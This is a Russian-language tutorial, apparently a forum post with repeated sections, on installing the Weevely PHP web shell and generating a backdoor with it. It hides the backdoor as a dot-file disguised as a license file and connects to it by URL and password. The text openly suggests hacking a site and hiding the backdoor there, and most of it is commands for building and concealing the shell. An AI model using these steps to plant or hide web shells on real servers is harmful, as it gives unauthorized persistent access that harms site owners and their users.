Weevely – это веб-шелл командной строки, динамически распространяемый по сети во время выполнения, предназначен для удалённого администрирования и тестирования на проникновение. Просто закиньте PHP скрипт, и программа обеспечит похожий на ssh терминал даже в ограниченном окружении.
Возможности:
github.com
С инструментом познакомились, теперь будем устанавливать его.
В некоторых дистрибутивах Linux, он установлен. Поможем тем, у кого его нету.
Для начала, обновимся
Далее, устанавливаем необходимые пакеты и зависимости
Теперь качаем репозиторий с гитаба
После скачивания, переходим в ее папку и смотрим список файлов
Видим питоновский скрипт инструмента weevely.py. Его и запускаем
Как мы видим, у инструмента есть три команды.
И генерируем
Видим что создался php скрипт, а точнее веб-шелл. Сделаем его не видимым для некоторых лиц, добавив в начале названия точку
Переходим в папку с бэкдором и переименовываем
К чему мы и стремились, при простом просмотре списка файлов с помощью команды ls, мы ничего не увидели. Однако если выполнить команду ls -la, мы увидим абсолютно все файлы в определенной директории.
Наш backdoor готов. Осталось хакнуть какой-то сайт и спрятать наш бэкдор там.
Для теста, подойдет локальный сервер. Загружаем скрипт на сервер и подключаемся к нему
Готово! Вот мы законнектились к бэкдору.
Возможности:
- Похожий на SSH терминал
- Запуск SQL консоли, завёрнутой на цель
- Пропуск HTTP трафика до цели через прокси
- Аудит безопасности настройки хоста
- Локальное монтирование целевой файловой системы
- Проведение сетевых сканирований завёрнутых на цель
- Выгрузка и загрузка файлов
- Порождение обратного и прямого TCP шелла
- Брут-форс внутренних служб
- Управление сжатыми архивами
- Агент бэкдора
GitHub - epinna/weevely3: Weaponized web shell
Weaponized web shell. Contribute to epinna/weevely3 development by creating an account on GitHub.
С инструментом познакомились, теперь будем устанавливать его.
В некоторых дистрибутивах Linux, он установлен. Поможем тем, у кого его нету.
Для начала, обновимся
Код:
apt-get update
Код:
sudo apt-get install g++ python-pip libyaml-dev python-dev
Код:
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade
Код:
git clone https://github.com/epinna/weevely3
Код:
cd weevely3 && ls
Код:
python weevely.py
- Подключиться к существующему бэкдору
- Восстановить существующую сессию подключения
- Сгенерировать новый бэкдор
Код:
mkdir backdoor
Код:
python2 weevely.py generate codeby backdoor/license.php
Переходим в папку с бэкдором и переименовываем
Код:
mv license.php .license.php
Наш backdoor готов. Осталось хакнуть какой-то сайт и спрятать наш бэкдор там.
Для теста, подойдет локальный сервер. Загружаем скрипт на сервер и подключаемся к нему
Код:
python2 weevely.py http://site.ru/.license.php password1234
http://site.ru/.license.php - полный путь до бэкдораpassword1234 - пароль для коннекта к бэкдору, который мы указывали при генерации
Код:
weevely> ls
Код:
inc
index.php
server.php
Готово! Вот мы законнектились к бэкдору.